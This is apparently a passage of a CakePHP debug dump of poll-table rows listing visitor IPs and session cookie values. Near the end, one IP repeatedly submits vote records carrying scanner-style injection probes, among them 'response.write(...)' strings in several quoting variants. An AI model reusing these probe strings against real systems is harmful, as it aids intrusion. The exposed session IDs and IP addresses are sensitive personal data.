'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 329 => array(
'id' => '872',
'ip' => '41.200.146.193',
'ip1' => 'CAKEPHP=a84a4bc3a91ac2d163b5e3e4e062d9cf',
'sondage_id' => '2'
),
(int) 330 => array(
'id' => '873',
'ip' => '154.121.99.212',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 331 => array(
'id' => '874',
'ip' => '41.201.126.217',
'ip1' => 'CAKEPHP=639d116b32fed3bc662345cac7d3209f',
'sondage_id' => '2'
),
(int) 332 => array(
'id' => '875',
'ip' => '129.45.37.65',
'ip1' => 'CAKEPHP=f39a3841a206162b2953fff2fc8ef2eb',
'sondage_id' => '2'
),
(int) 333 => array(
'id' => '876',
'ip' => '41.201.117.28',
'ip1' => 'CAKEPHP=b97f7f12fb12d536fce94c59068067da',
'sondage_id' => '2'
),
(int) 334 => array(
'id' => '877',
'ip' => '41.201.117.28',
'ip1' => 'CAKEPHP=b97f7f12fb12d536fce94c59068067da',
'sondage_id' => '2'
),
(int) 335 => array(
'id' => '878',
'ip' => '105.98.240.224',
'ip1' => 'CAKEPHP=b7ccc51c07b8cf821a8c17e5f528665d',
'sondage_id' => '2'
),
(int) 336 => array(
'id' => '879',
'ip' => '105.98.240.224',
'ip1' => 'CAKEPHP=ac622f9c08e8f862fd47240e2c17e55f',
'sondage_id' => '2'
),
(int) 337 => array(
'id' => '880',
'ip' => '5.62.20.23',
'ip1' => 'CAKEPHP=0fae5e4ec48ca3c6136a6aa20cf7429b',
'sondage_id' => '2'
),
(int) 338 => array(
'id' => '881',
'ip' => '105.235.137.166',
'ip1' => 'CAKEPHP=7b25f0a6ff938e9af63e27915ee8f079',
'sondage_id' => '2'
),
(int) 339 => array(
'id' => '882',
'ip' => '105.105.97.103',
'ip1' => 'CAKEPHP=f193497684ae7b808af03207444dfed9',
'sondage_id' => '2'
),
(int) 340 => array(
'id' => '883',
'ip' => '105.105.97.103',
'ip1' => 'CAKEPHP=c49a307d3cd902506f1703253ef72856',
'sondage_id' => '2'
),
(int) 341 => array(
'id' => '884',
'ip' => '147.161.181.1',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 342 => array(
'id' => '885',
'ip' => '197.207.210.108',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 343 => array(
'id' => '886',
'ip' => '107.189.1.96',
'ip1' => 'CAKEPHP=364bdc05eaf9814d450d5192eb8a71b2',
'sondage_id' => '2'
),
(int) 344 => array(
'id' => '887',
'ip' => '105.96.66.35',
'ip1' => 'CAKEPHP=56934cfcda2e808ef71b065ae8013f4f',
'sondage_id' => '2'
),
(int) 345 => array(
'id' => '888',
'ip' => '185.107.56.135',
'ip1' => 'CAKEPHP=04b00561d01ed7ce31f59a09003df896',
'sondage_id' => '2'
),
(int) 346 => array(
'id' => '889',
'ip' => '105.235.134.227',
'ip1' => 'CAKEPHP=0cb5ac93b0ec08335b3a5c557fbb666a',
'sondage_id' => '2'
),
(int) 347 => array(
'id' => '890',
'ip' => '154.121.66.239',
'ip1' => 'CAKEPHP=5045c87cb8ed891e162eec8aaa6a2d94',
'sondage_id' => '2'
),
(int) 348 => array(
'id' => '891',
'ip' => '105.111.103.237',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 349 => array(
'id' => '892',
'ip' => '105.111.120.94',
'ip1' => 'CAKEPHP=6ca9da7afc4771a566cd6e449e1ce2cd',
'sondage_id' => '2'
),
(int) 350 => array(
'id' => '893',
'ip' => '154.247.14.244',
'ip1' => 'CAKEPHP=e269e3c2e6e23f876d2a33049a51b007',
'sondage_id' => '2'
),
(int) 351 => array(
'id' => '894',
'ip' => '41.111.148.142',
'ip1' => 'CAKEPHP=502d9d82b62b8ee8c876b464c3323fb8',
'sondage_id' => '2'
),
(int) 352 => array(
'id' => '895',
'ip' => '198.16.66.123',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 353 => array(
'id' => '896',
'ip' => '198.16.66.123',
'ip1' => 'CAKEPHP=25a2cac5479acf4c1d90bc148587985d',
'sondage_id' => '2'
),
(int) 354 => array(
'id' => '897',
'ip' => '79.217.25.32',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 355 => array(
'id' => '898',
'ip' => '197.207.217.216',
'ip1' => 'CAKEPHP=ecaebee785f098ed3bec936cb9c1404d',
'sondage_id' => '2'
),
(int) 356 => array(
'id' => '899',
'ip' => '197.2.146.67',
'ip1' => 'CAKEPHP=65e266ba3131dff5a3bab8a6a318f447',
'sondage_id' => '2'
),
(int) 357 => array(
'id' => '900',
'ip' => '41.104.211.104',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 358 => array(
'id' => '901',
'ip' => '141.98.9.152',
'ip1' => 'CAKEPHP=a7c74b3203179384a8ec28427c043d1b',
'sondage_id' => '2'
),
(int) 359 => array(
'id' => '902',
'ip' => '141.98.9.152',
'ip1' => 'CAKEPHP=a7c74b3203179384a8ec28427c043d1b',
'sondage_id' => '2'
),
(int) 360 => array(
'id' => '903',
'ip' => '141.98.9.152',
'ip1' => 'CAKEPHP=a7c74b3203179384a8ec28427c043d1b',
'sondage_id' => '2'
),
(int) 361 => array(
'id' => '904',
'ip' => '141.98.9.152',
'ip1' => 'CAKEPHP=a7c74b3203179384a8ec28427c043d1b',
'sondage_id' => '2'
),
(int) 362 => array(
'id' => '905',
'ip' => '38.207.143.79',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 363 => array(
'id' => '906',
'ip' => '91.121.91.91',
'ip1' => 'CAKEPHP=65d37c64f43e8cc8b04d17c88eef9287',
'sondage_id' => '2'
),
(int) 364 => array(
'id' => '907',
'ip' => '196.20.125.12',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 365 => array(
'id' => '908',
'ip' => '196.20.125.12',
'ip1' => 'CAKEPHP=6b738c2b61fbb5d3199e4f67afc061a9',
'sondage_id' => '2'
),
(int) 366 => array(
'id' => '909',
'ip' => '41.101.147.228',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 367 => array(
'id' => '910',
'ip' => '41.101.147.228',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 368 => array(
'id' => '911',
'ip' => '41.101.147.228',
'ip1' => 'CAKEPHP=fbaaa5fab4dd14db93f5b7ed8a8de6b7',
'sondage_id' => '2'
),
(int) 369 => array(
'id' => '912',
'ip' => '62.48.248.182',
'ip1' => 'CAKEPHP=cd52a1866f88dd070d99d3625934483c',
'sondage_id' => '2'
),
(int) 370 => array(
'id' => '913',
'ip' => '141.98.9.152',
'ip1' => 'CAKEPHP=a7c74b3203179384a8ec28427c043d1b',
'sondage_id' => '2'
),
(int) 371 => array(
'id' => '914',
'ip' => '141.98.9.152',
'ip1' => 'CAKEPHP=a7c74b3203179384a8ec28427c043d1b',
'sondage_id' => '2'
),
(int) 372 => array(
'id' => '915',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 373 => array(
'id' => '916',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 374 => array(
'id' => '917',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 375 => array(
'id' => '918',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 376 => array(
'id' => '919',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 377 => array(
'id' => '920',
'ip' => '45.84.137.43',
'ip1' => 'CAKEPHP=48be2a5de402fbe32325b3a94ad44bbf',
'sondage_id' => '2'
),
(int) 378 => array(
'id' => '921',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 379 => array(
'id' => '922',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 380 => array(
'id' => '923',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 381 => array(
'id' => '924',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 382 => array(
'id' => '925',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 383 => array(
'id' => '926',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 384 => array(
'id' => '927',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 385 => array(
'id' => '928',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 386 => array(
'id' => '929',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 387 => array(
'id' => '930',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 388 => array(
'id' => '931',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 389 => array(
'id' => '932',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 390 => array(
'id' => '933',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 391 => array(
'id' => '934',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 392 => array(
'id' => '935',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 393 => array(
'id' => '936',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 394 => array(
'id' => '937',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 395 => array(
'id' => '938',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 396 => array(
'id' => '939',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 397 => array(
'id' => '940',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 398 => array(
'id' => '941',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 399 => array(
'id' => '942',
'ip' => '1d9YsvbeO',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 400 => array(
'id' => '943',
'ip' => '45.84.137.43',
'ip1' => '1noGHr0CO',
'sondage_id' => '2'
),
(int) 401 => array(
'id' => '944',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 402 => array(
'id' => '945',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 403 => array(
'id' => '946',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 404 => array(
'id' => '947',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 405 => array(
'id' => '948',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 406 => array(
'id' => '949',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 407 => array(
'id' => '950',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 408 => array(
'id' => '951',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 409 => array(
'id' => '952',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 410 => array(
'id' => '953',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 411 => array(
'id' => '954',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 412 => array(
'id' => '955',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 413 => array(
'id' => '956',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 414 => array(
'id' => '957',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 415 => array(
'id' => '958',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 416 => array(
'id' => '959',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 417 => array(
'id' => '960',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 418 => array(
'id' => '961',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 419 => array(
'id' => '962',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 420 => array(
'id' => '963',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 421 => array(
'id' => '964',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 422 => array(
'id' => '965',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 423 => array(
'id' => '966',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 424 => array(
'id' => '967',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 425 => array(
'id' => '968',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 426 => array(
'id' => '969',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 427 => array(
'id' => '970',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 428 => array(
'id' => '971',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 429 => array(
'id' => '972',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 430 => array(
'id' => '973',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 431 => array(
'id' => '974',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 432 => array(
'id' => '975',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 433 => array(
'id' => '976',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 434 => array(
'id' => '977',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 435 => array(
'id' => '978',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 436 => array(
'id' => '979',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 437 => array(
'id' => '980',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 438 => array(
'id' => '981',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 439 => array(
'id' => '982',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 440 => array(
'id' => '983',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 441 => array(
'id' => '984',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 442 => array(
'id' => '985',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 443 => array(
'id' => '986',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 444 => array(
'id' => '987',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 445 => array(
'id' => '988',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 446 => array(
'id' => '989',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 447 => array(
'id' => '990',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 448 => array(
'id' => '991',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 449 => array(
'id' => '992',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 450 => array(
'id' => '993',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 451 => array(
'id' => '994',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 452 => array(
'id' => '995',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 453 => array(
'id' => '996',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 454 => array(
'id' => '997',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 455 => array(
'id' => '998',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 456 => array(
'id' => '999',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 457 => array(
'id' => '1000',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 458 => array(
'id' => '1001',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 459 => array(
'id' => '1002',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 460 => array(
'id' => '1003',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 461 => array(
'id' => '1004',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 462 => array(
'id' => '1005',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 463 => array(
'id' => '1006',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 464 => array(
'id' => '1007',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 465 => array(
'id' => '1008',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 466 => array(
'id' => '1009',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 467 => array(
'id' => '1010',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 468 => array(
'id' => '1011',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 469 => array(
'id' => '1012',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 470 => array(
'id' => '1013',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 471 => array(
'id' => '1014',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 472 => array(
'id' => '1015',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 473 => array(
'id' => '1016',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 474 => array(
'id' => '1017',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 475 => array(
'id' => '1018',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 476 => array(
'id' => '1019',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 477 => array(
'id' => '1020',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 478 => array(
'id' => '1021',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 479 => array(
'id' => '1022',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 480 => array(
'id' => '1023',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 481 => array(
'id' => '1024',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 482 => array(
'id' => '1025',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 483 => array(
'id' => '1026',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 484 => array(
'id' => '1027',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 485 => array(
'id' => '1028',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 486 => array(
'id' => '1029',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 487 => array(
'id' => '1030',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 488 => array(
'id' => '1031',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 489 => array(
'id' => '1032',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 490 => array(
'id' => '1033',
'ip' => '45.84.137.43',
'ip1' => 'response.write(9266032*9679902)',
'sondage_id' => '2'
),
(int) 491 => array(
'id' => '1034',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 492 => array(
'id' => '1035',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 493 => array(
'id' => '1036',
'ip' => '45.84.137.43',
'ip1' => ''+response.write(9266032*9679902)+'',
'sondage_id' => '2'
),
(int) 494 => array(
'id' => '1037',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 495 => array(
'id' => '1038',
'ip' => '45.84.137.43',
'ip1' => '"+response.write(9266032*9679902)+"',
'sondage_id' => '2'
),
(int) 496 => array(
'id' => '1039',
'ip' => 'J7iOcF80',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 497 => array(
'id' => '1040',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 498 => array(
'id' => '1041',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 499 => array(
'id' => '1042',
'ip' => 'F2SRvYPd: XstcIBPr',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 500 => array(
'id' => '1043',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 501 => array(
'id' => '1044',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 502 => array(
'id' => '1045',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 503 => array(
'id' => '1046',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 504 => array(
'id' => '1047',
'ip' => '45.84.137.43',
'ip1' => 'Z4PpalDJ',
'sondage_id' => '2'
),
(int) 505 => array(
'id' => '1048',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 506 => array(
'id' => '1049',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 507 => array(
'id' => '1050',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 508 => array(
'id' => '1051',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 509 => array(
'id' => '1052',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 510 => array(
'id' => '1053',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 511 => array(
'id' => '1054',
'ip' => '45.84.137.43',
'ip1' => 'qeXYTPxG: s2rwKZ33',
'sondage_id' => '2'
),
(int) 512 => array(
'id' => '1055',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 513 => array(
'id' => '1056',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 514 => array(
'id' => '1057',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 515 => array(
'id' => '1058',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 516 => array(
'id' => '1059',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 517 => array(
'id' => '1060',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 518 => array(
'id' => '1061',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 519 => array(
'id' => '1062',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 520 => array(
'id' => '1063',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 521 => array(
'id' => '1064',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 522 => array(
'id' => '1065',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 523 => array(
'id' => '1066',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 524 => array(
'id' => '1067',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 525 => array(
'id' => '1068',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 526 => array(
'id' => '1069',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 527 => array(
'id' => '1070',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 528 => array(
'id' => '1071',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 529 => array(
'id' => '1072',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 530 => array(
'id' => '1073',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 531 => array(
'id' => '1074',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 532 => array(
'id' => '1075',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 533 => array(
'id' => '1076',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 534 => array(
'id' => '1077',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 535 => array(
'id' => '1078',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 536 => array(
'id' => '1079',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 537 => array(
'id' => '1080',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 538 => array(
'id' => '1081',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 539 => array(
'id' => '1082',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 540 => array(
'id' => '1083',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 541 => array(
'id' => '1084',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 542 => array(
'id' => '1085',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 543 => array(
'id' => '1086',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 544 => array(
'id' => '1087',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 545 => array(
'id' => '1088',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 546 => array(
'id' => '1089',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 547 => array(
'id' => '1090',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 548 => array(
'id' => '1091',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 549 => array(
'id' => '1092',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 550 => array(
'id' => '1093',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 551 => array(
'id' => '1094',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 552 => array(
'id' => '1095',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 553 => array(
'id' => '1096',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 554 => array(
'id' => '1097',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 555 => array(
'id' => '1098',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 556 => array(
'id' => '1099',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
